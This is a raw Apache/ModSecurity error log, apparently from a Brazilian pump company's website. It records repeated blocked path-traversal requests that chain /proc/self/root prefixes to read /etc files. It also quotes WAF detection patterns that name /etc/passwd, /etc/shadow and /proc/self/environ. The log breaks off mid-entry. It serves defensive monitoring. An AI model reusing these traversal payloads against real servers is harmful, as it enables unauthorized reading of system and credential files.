https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:47.917801 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.243.128:37296] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q9wF0L0L-SsrnPo5T1gAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:49.215288 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:37298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q-eoXxyEfFpUF8f9uEQAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:50.492219 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:60078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q-ta6ubjKNq_cu4a-fwAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:52.947119 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.241.31:44436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q_BCii7xarUs8iHZUQQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:18:53.023828 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.243.128:60088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q_fqxLDW4GITHUkTRjwAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:54.267123 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.243.128:60104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q_gF0L0L-SsrnPo5T3gAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:19:00.620316 2026] [:error] [pid 9818:tid 140411649607424] [client 74.7.241.31:49112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RBF1pVZ5mVmJwsFMcBQAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:19:02.471019 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:60118] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RBhCii7xarUs8iHZUTQAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:19:32.541909 2026] [mime_magic:error] [pid 10189:tid 140411632822016] (70014)End of file found: [client 57.141.18.3:34540] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:19:33.884838 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:40506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RJeoXxyEfFpUF8f9uRwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:19:40.548092 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.243.128:49470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RLPHIg5MgXLBnicPl6QAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:19:41.822987 2026] [:error] [pid 11642:tid 140411565680384] [client 74.7.243.128:46454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RLbninkcc-iUj5ApK3wAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:03.884247 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:46462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RQda6ubjKNq_cu4a-7AAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:05.571945 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.243.128:37802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RRfHIg5MgXLBnicPl_AAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:10.069553 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.243.128:37818] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RShCii7xarUs8iHZUbAAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:18.872050 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:46600] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RUgF0L0L-SsrnPo5UJwAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:22.492933 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:48432] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RVNa6ubjKNq_cu4a_CAAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:20:23.948106 2026] [:error] [pid 11167:tid 140411632822016] [client 74.7.243.128:60208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RV_HIg5MgXLBnicPmAQAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:24.267760 2026] [:error] [pid 11167:tid 140411666392832] [client 74.7.241.31:45196] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RWPHIg5MgXLBnicPmBAAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:20:25.303891 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.243.128:60218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RWfHIg5MgXLBnicPmBQAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:25.488486 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.241.31:45206] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RWV1pVZ5mVmJwsFMcMAAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:20:26.780290 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.241.31:45220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RWjJ3M9BSuKP7CAYD8AAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:20:27.325753 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.241.31:42106] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 